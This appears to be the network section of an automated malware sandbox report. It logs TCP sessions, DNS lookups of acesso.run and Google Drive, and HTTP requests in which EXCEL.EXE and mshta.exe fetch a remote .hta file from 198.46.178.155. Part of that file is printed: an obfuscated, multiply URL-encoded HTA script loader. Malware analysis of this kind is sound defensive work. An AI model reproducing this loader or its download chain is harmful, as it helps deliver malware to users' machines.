                                                                                                    Oct 29, 2024 10:14:05.764677048 CET4920880192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:05.766252995 CET4920880192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:05.771773100 CET804920894.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:05.771817923 CET4920880192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:05.777209997 CET804920894.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:06.722024918 CET804920894.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:06.722223997 CET4920880192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:06.728471994 CET804920894.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:06.728537083 CET4920880192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:06.856623888 CET4920980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:06.862046957 CET804920994.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:06.862117052 CET4920980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:06.863686085 CET4920980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:06.869102001 CET804920994.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:06.869151115 CET4920980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:06.874538898 CET804920994.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:07.836644888 CET804920994.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:07.836740017 CET4920980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:07.843380928 CET804920994.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:07.843436956 CET4920980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:08.009238005 CET4921080192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:08.014646053 CET804921094.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:08.014739037 CET4921080192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:08.016462088 CET4921080192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:08.021913052 CET804921094.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:08.021965027 CET4921080192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:08.027319908 CET804921094.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:08.988933086 CET804921094.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:09.001648903 CET4921080192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:09.007416964 CET804921094.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:09.007497072 CET4921080192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:09.204296112 CET4921180192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:09.211704016 CET804921194.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:09.211766005 CET4921180192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:09.214397907 CET4921180192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:09.219986916 CET804921194.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:09.220051050 CET4921180192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:09.225369930 CET804921194.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:10.198167086 CET804921194.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:10.198278904 CET4921180192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:10.204339981 CET804921194.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:10.204394102 CET4921180192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:10.335108995 CET4921280192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:10.340619087 CET804921294.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:10.340691090 CET4921280192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:10.342315912 CET4921280192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:10.347759962 CET804921294.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:10.347812891 CET4921280192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:10.353208065 CET804921294.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:11.307137012 CET804921294.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:11.307250023 CET4921280192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:11.313086987 CET804921294.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:11.313167095 CET4921280192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:11.447658062 CET4921380192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:11.453008890 CET804921394.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:11.453078985 CET4921380192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:11.454469919 CET4921380192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:11.459841013 CET804921394.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:11.459902048 CET4921380192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:11.465166092 CET804921394.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:12.407846928 CET804921394.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:12.407984018 CET4921380192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:12.413949966 CET804921394.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:12.414036036 CET4921380192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:12.534349918 CET4921480192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:12.539927006 CET804921494.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:12.540000916 CET4921480192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:12.541517019 CET4921480192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:12.547373056 CET804921494.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:12.547430992 CET4921480192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:12.553200006 CET804921494.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:13.526441097 CET804921494.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:13.526536942 CET4921480192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:13.532341957 CET804921494.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:13.532399893 CET4921480192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:13.657680988 CET4921580192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:13.663233042 CET804921594.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:13.663305044 CET4921580192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:13.665627956 CET4921580192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:13.670964956 CET804921594.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:13.671021938 CET4921580192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:13.676409960 CET804921594.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:14.647675037 CET804921594.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:14.647850037 CET4921580192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:14.653733015 CET804921594.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:14.653834105 CET4921580192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:14.788326979 CET4921680192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:14.793844938 CET804921694.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:14.793926954 CET4921680192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:14.795512915 CET4921680192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:14.800992966 CET804921694.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:14.801048040 CET4921680192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:14.806613922 CET804921694.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:15.776575089 CET804921694.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:15.776767015 CET4921680192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:15.782689095 CET804921694.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:15.782762051 CET4921680192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:15.909652948 CET4921780192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:15.915118933 CET804921794.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:15.915200949 CET4921780192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:15.916768074 CET4921780192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:15.922306061 CET804921794.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:15.922363997 CET4921780192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:15.927752972 CET804921794.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:16.895095110 CET804921794.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:16.895263910 CET4921780192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:16.902024984 CET804921794.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:16.902117968 CET4921780192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:17.034236908 CET4921880192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:17.258755922 CET804921894.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:17.258824110 CET4921880192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:17.260391951 CET4921880192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:17.265681982 CET804921894.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:17.265733004 CET4921880192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:17.271183014 CET804921894.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:18.229682922 CET804921894.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:18.229887009 CET4921880192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:18.236334085 CET804921894.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:18.236433029 CET4921880192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:18.379720926 CET4921980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:18.385241985 CET804921994.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:18.385318041 CET4921980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:18.386853933 CET4921980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:18.392244101 CET804921994.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:18.392312050 CET4921980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:18.399286985 CET804921994.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:19.358114004 CET804921994.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:19.358294964 CET4921980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:19.364547014 CET804921994.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:19.364617109 CET4921980192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:19.492985010 CET4922080192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:19.498651028 CET804922094.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:19.498719931 CET4922080192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:19.501027107 CET4922080192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:19.504311085 CET804922094.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:19.504384995 CET4922080192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:19.504404068 CET4922080192.168.2.2294.156.177.220
                                                                                                    Oct 29, 2024 10:14:19.507055998 CET804922094.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:19.510140896 CET804922094.156.177.220192.168.2.22
                                                                                                    Oct 29, 2024 10:14:19.510154009 CET804922094.156.177.220192.168.2.22

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 29, 2024 10:12:28.076356888 CET5456253192.168.2.228.8.8.8
                                                                                                    Oct 29, 2024 10:12:28.090097904 CET53545628.8.8.8192.168.2.22
                                                                                                    Oct 29, 2024 10:12:30.767505884 CET5291753192.168.2.228.8.8.8
                                                                                                    Oct 29, 2024 10:12:30.784085035 CET53529178.8.8.8192.168.2.22
                                                                                                    Oct 29, 2024 10:12:48.357741117 CET6275153192.168.2.228.8.8.8
                                                                                                    Oct 29, 2024 10:12:48.365431070 CET53627518.8.8.8192.168.2.22
                                                                                                    Oct 29, 2024 10:12:50.168251038 CET5789353192.168.2.228.8.8.8
                                                                                                    Oct 29, 2024 10:12:50.180087090 CET53578938.8.8.8192.168.2.22
                                                                                                    Oct 29, 2024 10:12:50.221719027 CET5789353192.168.2.228.8.8.8
                                                                                                    Oct 29, 2024 10:12:50.229481936 CET53578938.8.8.8192.168.2.22
                                                                                                    Oct 29, 2024 10:12:50.256877899 CET5482153192.168.2.228.8.8.8
                                                                                                    Oct 29, 2024 10:12:50.265027046 CET53548218.8.8.8192.168.2.22
                                                                                                    Oct 29, 2024 10:12:50.275075912 CET5482153192.168.2.228.8.8.8
                                                                                                    Oct 29, 2024 10:12:50.283982992 CET53548218.8.8.8192.168.2.22
                                                                                                    Oct 29, 2024 10:13:03.128408909 CET5471953192.168.2.228.8.8.8
                                                                                                    Oct 29, 2024 10:13:03.137006044 CET53547198.8.8.8192.168.2.22
                                                                                                    Oct 29, 2024 10:13:04.629134893 CET4988153192.168.2.228.8.8.8
                                                                                                    Oct 29, 2024 10:13:04.637435913 CET53498818.8.8.8192.168.2.22

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Oct 29, 2024 10:12:28.076356888 CET192.168.2.228.8.8.80x3f9eStandard query (0)acesso.runA (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:30.767505884 CET192.168.2.228.8.8.80x244aStandard query (0)acesso.runA (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:48.357741117 CET192.168.2.228.8.8.80x98c4Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:50.168251038 CET192.168.2.228.8.8.80xcec1Standard query (0)acesso.runA (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:50.221719027 CET192.168.2.228.8.8.80xcec1Standard query (0)acesso.runA (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:50.256877899 CET192.168.2.228.8.8.80x814cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:50.275075912 CET192.168.2.228.8.8.80x814cStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:13:03.128408909 CET192.168.2.228.8.8.80xf3b9Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:13:04.629134893 CET192.168.2.228.8.8.80xe5d8Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Oct 29, 2024 10:12:28.090097904 CET8.8.8.8192.168.2.220x3f9eNo error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:28.090097904 CET8.8.8.8192.168.2.220x3f9eNo error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:30.784085035 CET8.8.8.8192.168.2.220x244aNo error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:30.784085035 CET8.8.8.8192.168.2.220x244aNo error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:48.365431070 CET8.8.8.8192.168.2.220x98c4No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:50.180087090 CET8.8.8.8192.168.2.220xcec1No error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:50.180087090 CET8.8.8.8192.168.2.220xcec1No error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:50.229481936 CET8.8.8.8192.168.2.220xcec1No error (0)acesso.run172.67.162.95A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:50.229481936 CET8.8.8.8192.168.2.220xcec1No error (0)acesso.run104.21.74.191A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:50.265027046 CET8.8.8.8192.168.2.220x814cNo error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:12:50.283982992 CET8.8.8.8192.168.2.220x814cNo error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:13:03.137006044 CET8.8.8.8192.168.2.220xf3b9No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                    Oct 29, 2024 10:13:04.637435913 CET8.8.8.8192.168.2.220xe5d8No error (0)drive.usercontent.google.com142.250.185.97A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • acesso.run
                                                                                                    • drive.google.com
                                                                                                    • drive.usercontent.google.com
                                                                                                    • 198.46.178.155
                                                                                                    • 94.156.177.220

                                                                                                    HTTP Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.2249164198.46.178.155803360C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:12:29.613184929 CET388OUTGET /422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    UA-CPU: AMD64
                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                    Host: 198.46.178.155
                                                                                                    Connection: Keep-Alive
                                                                                                    Oct 29, 2024 10:12:30.268563032 CET1236INHTTP/1.1 200 OK
                                                                                                    Date: Tue, 29 Oct 2024 09:12:30 GMT
                                                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                    Last-Modified: Tue, 29 Oct 2024 05:32:14 GMT
                                                                                                    ETag: "20ca3-62596e8602d48"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Content-Length: 134307
                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: application/hta
                                                                                                    Data Raw: 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 4a 61 76 61 53 63 72 69 70 74 3e 6d 3d 27 25 33 43 73 63 72 69 70 74 25 33 45 25 30 41 25 33 43 25 32 31 2d 2d 25 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 38 75 6e 65 73 63 61 70 65 25 32 38 25 32 32 25 32 35 33 43 73 63 72 69 70 74 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 35 32 31 2d 2d 25 32 35 30 41 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 25 32 35 32 38 75 6e 65 73 63 61 70 65 25 32 35 32 38 25 32 35 32 32 25 32 35 32 35 33 43 25 32 35 32 35 32 31 44 4f 43 54 59 50 45 25 32 35 32 35 32 30 68 74 6d 6c 25 32 35 32 35 33 45 25 32 35 32 35 30 41 25 32 35 32 35 33 43 6d 65 74 61 25 32 35 32 35 32 30 68 74 74 70 2d 65 71 75 69 76 25 32 35 32 35 33 44 25 32 35 32 35 32 32 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 25 32 35 32 35 32 32 25 32 35 32 35 32 30 63 6f 6e 74 65 6e 74 25 32 35 32 35 33 44 25 32 35 32 35 32 32 49 45 25 32 35 32 35 33 44 45 6d 75 6c 61 74 65 49 45 38 25 32 35 32 35 32 32 25 32 35 32 35 32 30 25 32 35 32 [TRUNCATED]
                                                                                                    Data Ascii: <script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscRIPT%252520LAnGUAge%25253D%252522vbsCriPT%252522%25253E%25250Adim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                    Oct 29, 2024 10:12:30.268578053 CET1236INData Raw: 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25
                                                                                                    Data Ascii: 2509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                                                                                                    Oct 29, 2024 10:12:30.268583059 CET424INData Raw: 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35
                                                                                                    Data Ascii: %252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2525
                                                                                                    Oct 29, 2024 10:12:30.268769026 CET1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                    Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509olHvZMrMWnddKdIwvNlgAmQwxdFBabZMEakVSZclKyVbpWdhAQfnFwQIcwfiJqqrimKVAjlDciDQFVwlNHXRFhCZFgWeKNsZODgpkxtlOZdsVgpdXUMOPAAQWNfltCIglICalYcDHGvDANjeSlCYyKoBPcHy
                                                                                                    Oct 29, 2024 10:12:30.268775940 CET1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                    Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                    Oct 29, 2024 10:12:30.268783092 CET1236INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 32 43 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                    Data Ascii: 252509%252509%252509%252509%252509%25252C%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                    Oct 29, 2024 10:12:30.268789053 CET636INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                    Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25
                                                                                                    Oct 29, 2024 10:12:30.268872023 CET1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                    Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                    Oct 29, 2024 10:12:30.268966913 CET1236INData Raw: 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32
                                                                                                    Data Ascii: 509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                                                                                                    Oct 29, 2024 10:12:30.268973112 CET424INData Raw: 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30
                                                                                                    Data Ascii: 252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25250
                                                                                                    Oct 29, 2024 10:12:30.274260998 CET1236INData Raw: 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35 32 35 30 39 25 32 35
                                                                                                    Data Ascii: 09%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.2249166198.46.178.155803656C:\Windows\System32\mshta.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 29, 2024 10:12:32.571712017 CET465OUTGET /422/sw/nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme.hta HTTP/1.1
                                                                                                    Accept: */*
                                                                                                    Accept-Language: fr-FR
                                                                                                    UA-CPU: AMD64
                                                                                                    Accept-Encoding: gzip, deflate
